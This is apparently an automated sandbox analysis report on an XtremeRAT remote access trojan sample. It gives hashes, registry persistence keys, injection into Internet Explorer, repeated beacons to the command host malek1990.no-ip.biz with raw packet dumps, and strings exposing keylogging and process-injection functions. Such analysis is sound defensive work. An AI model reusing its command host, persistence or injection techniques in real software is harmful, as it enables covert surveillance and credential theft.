Analysis Date2015-05-23 04:59:25
MD5919a4caad81c810bd25829816f4a388e
SHA16894b96956de10c61116b0c44521df92b2015a2c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: 077a359572cb42cb3e036251eb2e22b8 sha1: fb5d1450247cafb633ca5fda898426b409e21831 size: 34304
SectionDATA md5: dc6aaa8531d0f010c4e89e692834971c sha1: 0457e65ddf397e8aa3f0dbc91a29ac57cba1a591 size: 512
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 884d0946d83d3de316ad2d2eb7c16a6a sha1: 8dcd8e183c015bafe3802deb5be0d8e118acf9d7 size: 3584
Section.tls md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rdata md5: 2b44bd00623cc310df7d5458aa2dd5a3 sha1: 0119411a83671023e7bd8836d4b2185170b8ceab size: 512
Section.reloc md5: 4782a0d02a0277dc1751278c9c03f138 sha1: e2df0d0ca1c8a4d159c6a28db7fcc1a356589eb0 size: 2560
Section.rsrc md5: 3be0bc9ab2c696fdf65082b6f4f10ebe sha1: 3c4c0b68a87910b189ed79580a665ddeb70cc77e size: 4096
Timestamp1992-06-19 22:22:17
VersionLegalCopyright: ζπζσστβαπυλοκεσπφειπψσξπερκπωγ
Assembly Version: 88.59.15.56
InternalName: Assembly Changer.exe
FileVersion: 47.5.36.75
CompanyName: νωπζωζεωβκαρτγινπςλεζφπτβδηφζ
LegalTrademarks: ωββαλβψππσρπηςσλερμβεμροχυδζ
Comments: στυιαδηθδχιιυτωβοιηψγφωμιβακχυ
ProductName: δδοσφανσλεελτομλππθωρηπυηιιμζπ
ProductVersion: 47.5.36.75
FileDescription: πθαψκγζθθλσωσεξακιηθπψσδξπςνυ
OriginalFilename: Assembly Changer.exe
PEhashaa2395ec9d3ee4dcb849d9ea16189543f2e8c31f
IMPhash781bcb1cdaf387c1f2f769461a041c02

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝
C:\WINDOWS\InstallDir\Flash .exe
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{0O8QFCSV-HB35-C210-H1UF-A56S7A6GT6RG}\StubPath ➝
C:\WINDOWS\InstallDir\Flash .exe restart
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝
C:\WINDOWS\InstallDir\Flash .exe
RegistryHKEY_CURRENT_USER\SOFTWARE\((Mutex))\ServerStarted ➝
5/23/2015 0:55:47 AM
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Creates FileC:\WINDOWS\InstallDir\Flash .exe
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\((Mutex)).cfg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe
Creates Mutex((Mutex))
Creates MutexXTREMEUPDATE

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\((Mutex)).dat
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates MutexZonesLockedCacheCounterMutex
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates MutexZonesCounterMutex
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex((Mutex))
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates MutexZonesCacheCounterMutex
Winsock DNSmalek1990.no-ip.biz

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Network Details:

DNSmalek1990.no-ip.biz
Type: A
46.60.82.246
HTTP GEThttp://malek1990.no-ip.biz:8085/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://malek1990.no-ip.biz:8085/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://malek1990.no-ip.biz:8085/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://malek1990.no-ip.biz:8085/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://malek1990.no-ip.biz:8085/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://malek1990.no-ip.biz:8085/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://malek1990.no-ip.biz:8085/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://malek1990.no-ip.biz:8085/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://malek1990.no-ip.biz:8085/1234567890.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 46.60.82.246:8085
Flows TCP192.168.1.1:1033 ➝ 46.60.82.246:8085
Flows TCP192.168.1.1:1034 ➝ 46.60.82.246:8085
Flows TCP192.168.1.1:1035 ➝ 46.60.82.246:8085
Flows TCP192.168.1.1:1036 ➝ 46.60.82.246:8085
Flows TCP192.168.1.1:1037 ➝ 46.60.82.246:8085
Flows TCP192.168.1.1:1038 ➝ 46.60.82.246:8085
Flows TCP192.168.1.1:1039 ➝ 46.60.82.246:8085
Flows TCP192.168.1.1:1040 ➝ 46.60.82.246:8085

Raw Pcap
0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6d616c65 6b313939 302e6e6f 2d69702e   malek1990.no-ip.
0x000000c0 (00192)   62697a3a 38303835 0d0a436f 6e6e6563   biz:8085..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6d616c65 6b313939 302e6e6f 2d69702e   malek1990.no-ip.
0x000000c0 (00192)   62697a3a 38303835 0d0a436f 6e6e6563   biz:8085..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6d616c65 6b313939 302e6e6f 2d69702e   malek1990.no-ip.
0x000000c0 (00192)   62697a3a 38303835 0d0a436f 6e6e6563   biz:8085..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6d616c65 6b313939 302e6e6f 2d69702e   malek1990.no-ip.
0x000000c0 (00192)   62697a3a 38303835 0d0a436f 6e6e6563   biz:8085..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6d616c65 6b313939 302e6e6f 2d69702e   malek1990.no-ip.
0x000000c0 (00192)   62697a3a 38303835 0d0a436f 6e6e6563   biz:8085..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6d616c65 6b313939 302e6e6f 2d69702e   malek1990.no-ip.
0x000000c0 (00192)   62697a3a 38303835 0d0a436f 6e6e6563   biz:8085..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6d616c65 6b313939 302e6e6f 2d69702e   malek1990.no-ip.
0x000000c0 (00192)   62697a3a 38303835 0d0a436f 6e6e6563   biz:8085..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6d616c65 6b313939 302e6e6f 2d69702e   malek1990.no-ip.
0x000000c0 (00192)   62697a3a 38303835 0d0a436f 6e6e6563   biz:8085..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f313233 34353637 3839302e   GET /1234567890.
0x00000010 (00016)   66756e63 74696f6e 73204854 54502f31   functions HTTP/1
0x00000020 (00032)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000030 (00048)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000040 (00064)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000050 (00080)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000060 (00096)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000070 (00112)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000080 (00128)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x00000090 (00144)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000a0 (00160)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000b0 (00176)   6d616c65 6b313939 302e6e6f 2d69702e   malek1990.no-ip.
0x000000c0 (00192)   62697a3a 38303835 0d0a436f 6e6e6563   biz:8085..Connec
0x000000d0 (00208)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000e0 (00224)   0d0a0d0a                              ....


Strings
- 
....
/.
 --- 
000004b0
47.5.36.75
88.59.15.56
[Accept]
[Arrow Down]
[Arrow Left]
[Arrow Right]
[Arrow Up]
Assembly Changer.exe
Assembly Version
[Backspace]
[Back Tab]
BINDER
[Caps Lock]
.cfg
[CLIPBOARD] ---- 
[CLIPBOARD END]
Comments
CompanyName
CONFIG
[Context Menu]
[Copy]
.dat
%DEFAULTBROWSER%
[Delete]
DVCLAL
[End]
ENDSERVERBUFFER
[Esc]
.exe
[Execute]
explorer.exe
explorer.exe 
[F1]
[F10]
[F11]
[F12]
[F13]
[F14]
[F15]
[F16]
[F17]
[F18]
[F19]
[F2]
[F20]
[F21]
[F22]
[F23]
[F24]
[F3]
[F4]
[F5]
[F6]
[F7]
[F8]
[F9]
FakeMessage
FileDescription
FileVersion
[Finish]
frgjbfdkbnfsdjbvofsjfrfre
frgkmjgtmklgtlrglt
.functions
[Help]
hgtrfsgfrsgfgregtregtr
[Home]
http://
[Insert]
InstalledServer
InternalName
jiejwogfdjieovevodnvfnievn
jytjyegrsfvfbgfsdf
/K$?
KeyDelBackspace
LastSize
[Left Alt]
[Left Ctrl]
LegalCopyright
LegalTrademarks
Load
local
[Mail]
[Media]
\Microsoft\Windows\
[Mode Change]
Mutex
[Next Track]
%NOINJECT%
[Num Lock]
Numpad
[Numpad -]
[Numpad /]
[Numpad .]
[Numpad *]
[Numpad +]
open
OriginalFilename
PACKAGEINFO
[Page Down]
[Page Up]
[Pause]
[Play]
[Play / Pause]
[Previous Track]
[Print]
[Print Screen]
[Process]
ProductName
ProductVersion
[Reset]
restart
 restart
[Right Alt]
[Right Ctrl]
[Scrol Lock]
[Select]
[Separator]
ServerStarted
Shell
[Sleep]
SOFTWARE\
SOFTWARE\FakeMessage
Software\Microsoft\Active Setup\Installed Components\
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows NT\CurrentVersion\Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\XtremeRAT
[Stop]
StringFileInfo
StubPath
svchost.exe
[Tab]
Translation
trhgtehgfsgrfgtrwegtre
VarFileInfo
[Volume Down]
[Volume Mute]
[Volume Up]
VS_VERSION_INFO
x.html
.xtr
XTREME
XTREMEBINDER
XtremeKeylogger
Xtreme RAT
XTREMEUPDATE
[Zoom]
;+<<<]<
$0(0,0004080<0D0H0L0l0p0t0
0"0*020:0B0J0R0Z0b0j0r0z0
0&0,090>0C0M0V0\0e0q0
%06789:;<&'()*+,-./12345
0b1g1l1q1}1
>$>0>>>D>N>S>j>v>
1"1:1b1#4/4<4N4
1&191F1R1W1a1f1l1v1
1?1X1q1
1kZ/Y|9Y
2%20252:2D2T2\2d2o2t2~2
2"2&2*2.22262:2>2B2F2J2N2R2V2Z2^2b2f2j2n2r2v2z2~2
2#2*2:2T2_2e2s2
273=3R3c3
2Functions
:+:2:S:
3"3(31373B3N3W3_3k3y3
3"3&3*3.32363:3>3B3F3J3N3R3V3Z3^3b3f3j3q3
3"3,3C3O3V3h3z3
3[4g4n4
3J3f3r3
424:4B4J4R4Z4b4j4r4z4
4,4=4N4_4p4
4$4Y4`4
4=5w5}5
<#<-<4<9<E<U<f<u<
5"5*525:5B5J5R5Z5b5j5r5z5
5+5<5M5^5o5
5K6Q6w6
5K6X6^6h6t6|6
5N6X6b6l6v6
6"6*626:6B6J6R6Z6b6j6r6z6
6*6;6L6]6n6
6?6>7F7N7
686B6i6n6s6
>6?C?K?]?
=&>.>6>O>
7%767c7i7t7
7&7=7C7T7Z7w7}7
7)7:7K7\7m7~7
7<7R7g7s7
7&7r7x7
7c8o8|8
829=9G9Q9[9e9
8"8,868H8\8`8d8h8l8p8t8x8|8
8+8:8?8`8x8w;
8"8[8i8t8
8(898J8[8l8}8
8"8G8S8\8
8$919<9F9w9
939=9M9_9
99:?:K:R:j:w:
?%?9?C?V?\?p?
;9;E;J;t;y;
*^>9X%
9@:Y:b:o:
advapi32.dll
:a>k>	?
CallNextHookEx
CharLowerW
CharNextW
CharUpperW
CloseClipboard
CloseHandle
CopyFileW
CreateDirectoryW
CreateFileW
CreateMutexW
CreateProcessW
CreateRemoteThread
CreateThread
CreateToolhelp32Snapshot
CreateWindowExW
DefWindowProcA
DeleteFileW
DeleteUrlCacheEntryW
DispatchMessageA
=/><>D>V>
ExitProcess
FindExecutableW
FindFirstFileW
FindResourceW
FreeLibrary
FreeResource
FtpPutFileW
FtpSetCurrentDirectoryW
GetClipboardData
GetCommandLineW
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDateFormatW
GetDesktopWindow
GetFileAttributesW
GetFileSize
GetForegroundWindow
GetKeyboardLayout
GetKeyboardState
GetKeyState
GetLastError
GetLocalTime
GetModuleFileNameExW
GetModuleFileNameW
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetSystemDirectoryW
GetSystemTime
GetTempPathW
GetThreadContext
GetTimeFormatW
GetWindowRect
GetWindowsDirectoryW
GetWindowTextW
GetWindowThreadProcessId
GlobalLock
GlobalSize
GlobalUnlock
HeapAlloc
HeapFree
HeapReAlloc
Hf;4Cu
.idata
InternetCloseHandle
InternetConnectW
InternetOpenW
;&;.;<;J;{;
JM8@*B
;j<t<~<
k38O~m
kernel32.dll
Kernel32.dll
:&:=:K:`:l:z:
KWindows
?L?d?w?
LoadLibraryA
LoadResource
LocalAlloc
LocalFileTimeToFileTime
LockResource
lstrlenW
MapVirtualKeyW
MessageBoxW
MultiByteToWideChar
NJ$>CUP#
ntdll.dll
NtSetInformationProcess
NtUnmapViewOfSection
;-;N;Z;x;
oleaut32.dll
OpenClipboard
OpenProcess
PeekMessageA
Portions Copyright (c) 1999,2003 Avenger by NhT
PostMessageA
P.reloc
Process32FirstW
Process32NextW
P.rsrc
PSAPI.dll
?!?P?U?x?}?
q6q4_!e
QQQQQQQSVW
QQQQQQS
R1Y1f1
RaiseException
.rdata
ReadFile
ReadProcessMemory
RegCloseKey
RegCreateKeyExW
RegCreateKeyW
RegisterClassW
RegisterWindowMessageW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
ResumeThread
RtlUnwind
SendMessageA
SetClipboardViewer
SetEndOfFile
SetErrorMode
SetFileAttributesW
SetFilePointer
SetFileTime
SetProcessDEPPolicy
SetThreadContext
SetThreadPriority
SetWindowsHookExW
SHDeleteKeyW
shell32.dll
Shell32.dll
ShellExecuteW
SHGetMalloc
SHGetPathFromIDListW
SHGetSpecialFolderLocation
shlwapi.dll
ShowWindow
SizeofResource
SysAllocStringLen
SysFreeString
SysInit
SysReAllocStringLen
System
SystemTimeToFileTime
;!;/;T;
TerminateProcess
TerminateThread
This program must be run under Win32
TlsGetValue
TlsSetValue
ToUnicodeEx
TranslateMessage
?"?'???U?c?s?
UnhandledExceptionFilter
UnhookWindowsHookEx
UnitConfigs
UnitCryptString
UnitGetServer
UnitInjectProcess
UnitInjectServer
UnitInstallServer
UnitKeylogger
URLDownloadToFileW
urlmon.dll
; <.<U<s<
user32.dll
UTypes
VirtualAlloc
VirtualAllocEx
VirtualFree
VirtualFreeEx
VirtualProtectEx
WaitForSingleObject
WideCharToMultiByte
WideString
wininet.dll
=#=W=l=
WriteFile
WriteProcessMemory
WVXEGHF@A
;W]XV.
YUnitBinder
_^[YY]
YZ]_^[